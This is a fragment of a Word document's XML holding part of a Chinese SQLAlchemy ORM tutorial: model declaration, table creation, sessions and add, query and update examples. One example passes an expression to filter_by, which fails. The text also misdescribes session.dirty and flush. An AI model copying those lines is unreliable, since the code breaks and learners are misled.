    <w:p w14:paraId="1F2BDC93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># pool_size: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接池的大小，默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个，设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时表示连接无限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B9B5B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># pool_recycle: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置时间以限制数据库多久没连接自动断开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7CFDCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192196E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="595" w:name="_Toc159780028"/>
      <w:r>
        <w:t>创建数据库表类（模型）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="595"/>
    </w:p>
    <w:p w14:paraId="38A64E25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>前面有提到</w:t>
      </w:r>
      <w:r>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:t>的重要特点，那么我们操作表的时候就需要通过操作对象来实现，现在我们来创建一个类，以常见的用户表举例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F10A673" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCE6EC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy.ext.declarative import declarative_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CC2CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4A0BA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Base = declarative_base()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD4BE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D458EBF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Users(Base):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10820736" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    __tablename__ = "users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B6394" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3808111D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    id = Column(Integer, primary_key=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2885520A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    name = Column(String(64), unique=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA90E92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    email = Column(String(64))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A0AEB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245B5462" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def __init__(self, name, email):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC10C8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.name = name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0AFB47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.email = email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033D22AF" w14:textId="77777777" w:rsidR="004C2E82" w:rsidRDefault="004C2E82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535690E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>declarative_base()</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>sqlalchemy</w:t>
      </w:r>
      <w:r>
        <w:t>内部封装的一个方法，通过其构造一个基类，这个基类和它的子类，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>类和数据库表关联映射起来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B020460" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576EA686" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>数据库表模型类通过</w:t>
      </w:r>
      <w:r>
        <w:t>__tablename__</w:t>
      </w:r>
      <w:r>
        <w:t>和表关联起来，</w:t>
      </w:r>
      <w:r>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:t>表示数据表的列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF73FBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="596" w:name="_Toc159780029"/>
      <w:r>
        <w:t>生成数据库表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="596"/>
    </w:p>
    <w:p w14:paraId="0A55266E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Base.metadata.create_all(engine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB00B98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>创建表，如果存在则忽略，执行以上代码，就会发现在</w:t>
      </w:r>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:t>中创建了</w:t>
      </w:r>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t>表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB9CAEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="597" w:name="_Toc159780030"/>
      <w:r>
        <w:t>操作数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="597"/>
    </w:p>
    <w:p w14:paraId="35AA6739" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>表创建好了就是操作数据了，常见的操作增删改查，我们一一介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546C4FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="598" w:name="_Toc159780031"/>
      <w:r>
        <w:t>session</w:t>
      </w:r>
      <w:bookmarkEnd w:id="598"/>
    </w:p>
    <w:p w14:paraId="66FFB1C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A538B35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sqlalchemy</w:t>
      </w:r>
      <w:r>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t>用于创建程序和数据库之间的会话，所有对象的载入和保存都需要通过</w:t>
      </w:r>
      <w:r>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72107CBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>sessionmaker</w:t>
      </w:r>
      <w:r>
        <w:t>调用创建一个工厂，并关联</w:t>
      </w:r>
      <w:r>
        <w:t>Engine</w:t>
      </w:r>
      <w:r>
        <w:t>以确保每个</w:t>
      </w:r>
      <w:r>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t>都可以使用该</w:t>
      </w:r>
      <w:r>
        <w:t>Engine</w:t>
      </w:r>
      <w:r>
        <w:t>连接资源：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E750A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2CEFC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy.orm import sessionmaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF680FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBEC3B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07666B72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>DbSession = sessionmaker(bind=engine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F34977A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session = DbSession()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA423D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FF1CE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t>的常见操作方法包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404E685" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>flush</w:t>
      </w:r>
      <w:r>
        <w:t>：预提交，提交到数据库文件，还未写入数据库文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C4812" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:t>：提交了一个事务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6135A684" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>rollback</w:t>
      </w:r>
      <w:r>
        <w:t>：回滚</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6241F6D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:t>：关闭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A74444" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F293FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>增</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323F5A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>举个最简单的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3592D51D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D069924" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>add_user = Users("test", "test123@qq.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612DF196" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.add(add_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A99FCD5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40853C17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525F077C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.add()</w:t>
      </w:r>
      <w:r>
        <w:t>将会把</w:t>
      </w:r>
      <w:r>
        <w:t>Model</w:t>
      </w:r>
      <w:r>
        <w:t>加入当前</w:t>
      </w:r>
      <w:r>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t>维护的持久空间</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>可以从</w:t>
      </w:r>
      <w:r>
        <w:t>session.dirty</w:t>
      </w:r>
      <w:r>
        <w:t>看到</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>中，直到</w:t>
      </w:r>
      <w:r>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:t>时提交到数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AF04AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F533884" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Q1</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:t>之后如何直接返回对象的属性？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ABE75D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>可以在</w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:t>之后执行</w:t>
      </w:r>
      <w:r>
        <w:t>db.session.flush()</w:t>
      </w:r>
      <w:r>
        <w:t>，这样便可在</w:t>
      </w:r>
      <w:r>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>到对象的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7923C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Q2</w:t>
      </w:r>
      <w:r>
        <w:t>：如何进行批量插入，性能比较？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0811CB29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>批量插入共有以下几种方法，对它们的批量做了比较，分别是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DABA2B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>session.add_all() &lt; bulk_save_object() &lt; bulk_insert_mappings() &lt; SQLAlchemy_core()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8CF5A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219B712" w14:textId="43692FF1" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>查询是最常用的一个操作了，举个最简单的查询例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9124F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>users = session.query(Users).filter_by(id=1).all()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4452FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for item in users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E301795" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(item.name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1605BC5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>通常我们通过以上查询模式获取数据，需要注意的是，通过</w:t>
      </w:r>
      <w:r>
        <w:t>session.query()</w:t>
      </w:r>
      <w:r>
        <w:t>我们查询返回了一个</w:t>
      </w:r>
      <w:r>
        <w:t>Query</w:t>
      </w:r>
      <w:r>
        <w:t>对象，此时还没有去具体的数据库中查询，只有当执行具体的</w:t>
      </w:r>
      <w:r>
        <w:t>.all()</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>.first()</w:t>
      </w:r>
      <w:r>
        <w:t>等函数时才会真的去操作数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75184B1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4006D075" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>其中，</w:t>
      </w:r>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>filter_by</w:t>
      </w:r>
      <w:r>
        <w:t>两个过滤方法，上述例子也可写为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6077FD6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7642587F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>users = session.query(Users).filter_by(Users.id == 1).all()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A03C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>通常这两个方法都会用到的，所以一定要掌握它们的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34801567" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3FCDAD70" wp14:editId="50838AE3">
            <wp:extent cx="5486400" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1379220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1F306" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B950885" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>更新数据有两种方法，一种是使用</w:t>
      </w:r>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7499E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.query(Users).filter_by(id=1).update({'name': "Jack"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7741069C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>另一种是操作对应的表模型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A78AC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>users = session.query(Users).filter_by(name="Jack").first()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A82E028" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>users.name = "test"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE5AC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.add(users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324CCAF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>这两种方式呢，一般批量更新的话我会选前者，而要对查询获取对象属性之后再更新的场景就需要使用后者。</w:t>
      </w:r>
    </w:p>
